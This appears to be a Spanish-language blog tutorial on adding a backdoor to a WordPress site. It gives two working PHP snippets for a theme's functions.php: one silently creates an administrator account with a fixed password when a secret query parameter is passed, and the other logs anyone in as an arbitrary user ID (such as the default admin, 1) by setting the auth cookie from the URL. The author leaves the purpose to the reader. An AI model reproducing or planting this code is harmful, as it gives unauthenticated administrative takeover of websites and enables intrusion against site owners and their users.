puerta trasera

Cómo crear una puerta trasera para entrar en WordPress

En esta entrada vamos a ver cómo crear una puerta trasera o backdoor en WordPress. Reitero, vamos a ver el cómo, el porqué hacerlo es otro tema que queda en manos y es responsabilidad de cada uno…

¿Qué es una puerta trasera?

En la informática, una puerta trasera (o en inglés backdoor) es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas «puertas» pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, ya que pueden haber sido diseñadas con la intención de tener una entrada secreta.

Wikipedia

Resumiendo, es una acceso al panel de administración de WordPress sin pasar por el login. Vamos a ver dos formas de hacerlo.

La primera es poniendo una función en el archivo functions.php del tema para que genere un nuevo usuario con rol administrador y con las credenciales que definamos. La idea es enganchar esta función al hook wp_head para que se ejecute siempre que se cargue la página SI y sólo SI hemos definido un parámetro concreto con un valor concreto por query string.

Por ejemplo, definiremos un parámetro backdoor y un valor crea. En caso de cumplirse esta condición, crearemos un nuevo usuario backdoor (si no existe) con la contraseña my-password.

<?php

function my_backdoor() {
    if ($_GET['backdoor'] == 'crea') {
        require('wp-includes/registration.php');
        if (!username_exists('backdoor')) {
            $user_id = wp_create_user('backdoor', 'my-password');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            echo 'Puerta trasera creada';
            die();
        }
    }
}
add_action( 'wp_head', 'my_backdoor' );

Es decir, que si entramos en https://tu-dominio.com/?backdoor=crea y el usuario backdoor no existe, lo crearemos con la contraseña que definamos y el rol administrador. Ahora podremos dirigirnos al login e iniciar sesión con este usuario.

La segunda opción tiene una mecánica parecida. En lugar de generar un nuevo usuario, crearemos la cookie de sesión de un usuario existente. Para ello deberemos conocer el ID de un usuario administrador o probar con el 1 que es el que genera WordPress al instalarse. Pasaremos dos parámetros, uno que actuará como trigger y otro para indicar el ID, es decir, quedaría algo como https://tu-dominio.com/?backdoor=entra&who=1

<?php

function my_login_force() {
    if ($_GET["backdoor"] == "entra" && isset($_GET["who"])) {
        $id = $_GET["who"];
        wp_set_auth_cookie($id);
        wp_redirect('/wp-admin');
        die();
    }
}
add_action( 'init', 'my_login_force' );

Puedes asegurar un poco más éste código por ejemplo añadiendo una secret key encriptada en MD5. De este modo pasarás una clave a través de un parámetro nuevo y la comprobarás encriptada en MD5 contra tu secret key, y en caso de coincidir ejecutar el código.

Los motivos para tener una puerta trasera pueden ser variados, si usas este código es bajo tu responsabilidad. Sé bueno

¿Te ha resultado útil esta información? 🍺

Si este post te ha resuelto un problema, invítame a un café o a una cerveza. Con este pequeño gesto me animas a seguir escribiendo.

Comentarios

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *:

  • El fin del tratamiento es únicamente la moderación de comentarios para evitar spam
  • La legitimación es tu consentimiento al comentar
  • No se comunicará ningún dato a terceros salvo por obligación legal
  • Tienes derecho al acceso, rectificación y eliminación de los comentarios